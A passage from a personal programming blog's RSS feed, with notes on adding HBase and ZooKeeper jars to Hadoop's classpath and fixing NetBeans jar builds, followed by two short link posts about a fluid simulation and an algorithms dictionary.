<p>Ran into problems today trying to run a jar in Hadoop that needed to reference the hbase jar and zookeeper jar. To get it to work I had to make a change to hadoop-env.sh. The change goes under the line</p>
<pre># Extra Java CLASSPATH elements.  Optional</pre>
<p>and the change was</p>
<pre>export HADOOP_CLASSPATH=/usr/local/hbase/hbase-0.20.2.jar:/usr/local/zookeeper/zookeeper-3.2.2.jar</pre>
<p>which basically adds the paths to the hbase jar and the zookeeper jar.</p>
<h2>Building a Hadoop compatible jar from netbeans</h2>
<p>Right &#8211; couldn&#8217;t build a jar that would work with hadoop from netbeans 6.7. After consulting the most knowledgeable java developer I know, we got to the bottom of it, sort of. It turns out the default manifest that netbeans creates seems to cause issues &#8211; all sorts of inexplicable errors in fact. So the solution was to simply delete the <strong>manifest.mf</strong> from the root of the project. Phew. Might try and look into it further at some point, still working on a workflow based on netbeans.</p>
<h2>Important port numbers</h2>
<p>zookeeper client port = 2181</p>
<p>Hbase master port = 60000</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/142/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Multiple Fluid Simulation</title>
		<link>http://blog.maxgarfinkel.com/archives/120</link>
		<comments>http://blog.maxgarfinkel.com/archives/120#comments</comments>
		<pubDate>Thu, 01 Oct 2009 20:07:43 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=120</guid>
		<description><![CDATA[Multiple Fluid Simulation. An amazing simulation!]]></description>
			<content:encoded><![CDATA[<p><a href="http://kotsoft.googlepages.com/multiplefluid.html">Multiple Fluid Simulation</a>. An amazing simulation!</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/120/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dictionary of Algorithms and Data Structures</title>
		<link>http://blog.maxgarfinkel.com/archives/118</link>
		<comments>http://blog.maxgarfinkel.com/archives/118#comments</comments>
		<pubDate>Thu, 01 Oct 2009 10:14:36 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=118</guid>
		<description><![CDATA[Dictionary of Algorithms and Data Structures. Fantastic list of algorithms and computer science problems. Very useful]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.itl.nist.gov/div897/sqg/dads/">Dictionary of Algorithms and Data Structures</a>.</p>
<p>Fantastic list of algorithms and computer science problems. Very useful.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/118/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
